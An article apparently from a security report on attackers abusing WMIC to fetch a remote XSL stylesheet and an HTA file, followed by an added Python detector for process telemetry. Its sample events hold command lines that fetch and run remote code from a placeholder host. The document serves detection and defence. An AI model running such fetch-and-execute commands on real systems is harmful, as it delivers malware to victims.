WMIC provides administrative capabilities for local and remote systems. It can start and terminate processes, execute files and alter system settings. WMIC has previously been used by various threat actors to move laterally across a compromised network, but it is not commonly used as an infection vector.
Various payloads have been delivered using this method, including a keylogger, an email and browser password stealer, a cryptocurrency miner, a backdoor and a spam botnet.
The use of WMIC benefits the attackers in two ways: because it is a signed, built-in Windows utility, it helps them remain inconspicuous, and it also gives them a powerful tool to aid their activities. The WMIC utility provides a command-line interface for WMI, which exposes an array of administrative capabilities for local and remote systems and can be used to query system settings, stop processes, and execute scripts locally or remotely. Parallels can be drawn between WMIC and PowerShell, another legitimate tool found on Windows systems that is increasingly being abused by cybercriminals.
- The attack chain begins with the arrival of a shortcut (.lnk) file delivered via a URL, such as a link in an email, or sent as an email attachment. Once the recipient clicks on the file, the next stage in the attack is initiated.
- The shortcut file contains a WMIC command to download a file from a remote server.
- The downloaded file is a malicious XSL file.
- The URL is used to download an HTML Application (HTA) file.
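The attack chain above leaves a recognisable trace in process-creation telemetry: a WMIC invocation whose stylesheet argument is a URL rather than a local file, followed by mshta.exe being launched from the network. The following detection logic is an added example written for this page, not code from the original article or from any vendor product. It assumes process-creation records of the shape (parent image, image, command line), as one would extract from Sysmon Event ID 1 or Windows Security event 4688, and it relies on WMIC's documented `/format:` switch, which accepts either a local XSL path or a URL. The sample events, hostnames and file names are constructed placeholders.

```python
"""Flag WMIC calls that load a remote XSL stylesheet and HTA launches by URL.

Added detection example (not the article's code). Assumed record shape:
parent image, image, command line, as taken from Sysmon EID 1 / Security 4688.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# WMIC's /format: switch takes an XSL path or URL; a URL means the stylesheet
# is fetched from a remote server (the pattern the article describes).
REMOTE_XSL = re.compile(r"/format\s*:\s*[\"']?\s*(?:https?|ftp)://", re.IGNORECASE)
# mshta.exe given a URL argument loads the HTA directly from the network.
URL_ARG = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(ev: ProcessEvent) -> List[str]:
    """Return the list of reasons an event looks like the XSL/HTA chain (empty if none)."""
    reasons: List[str] = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    if image == "wmic.exe" and REMOTE_XSL.search(ev.command_line):
        reasons.append("wmic.exe /format: points at a remote XSL stylesheet")
    if image == "mshta.exe" and URL_ARG.search(ev.command_line):
        reasons.append("mshta.exe launched with a URL argument")
    if image == "mshta.exe" and parent == "wmic.exe":
        reasons.append("mshta.exe spawned by wmic.exe")
    return reasons


def find_suspicious(events: List[ProcessEvent]) -> List[Tuple[int, List[str]]]:
    """Index every event that triggers at least one rule, with its reasons."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyse(ev))]


# Constructed sample telemetry; hostnames and file names are placeholders.
SAMPLE_EVENTS = [
    # 0: routine inventory query from an admin shell (should not fire)
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic os get caption,version"),
    # 1: local stylesheet, the legitimate use of /format: (should not fire)
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic process list /format:"C:\Windows\System32\wbem\csv.xsl"'),
    # 2: WMIC launched via Explorer (as a clicked shortcut would) with a remote XSL
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic os get /format:http://example.invalid/PLACEHOLDER.xsl"),
    # 3: mshta.exe fetching an HTA by URL, with wmic.exe as its parent
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta http://example.invalid/PLACEHOLDER.hta"),
]


if __name__ == "__main__":
    for idx, why in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for line in why:
            print(f"  - {line}")
```

Run against the constructed sample, events 2 and 3 fire while the benign inventory query and the local-stylesheet call do not, which is the distinction that matters in practice: `/format:` with a local XSL is everyday administrative use, so alerting on WMIC alone would drown analysts in noise, whereas a URL in that position has no routine administrative justification.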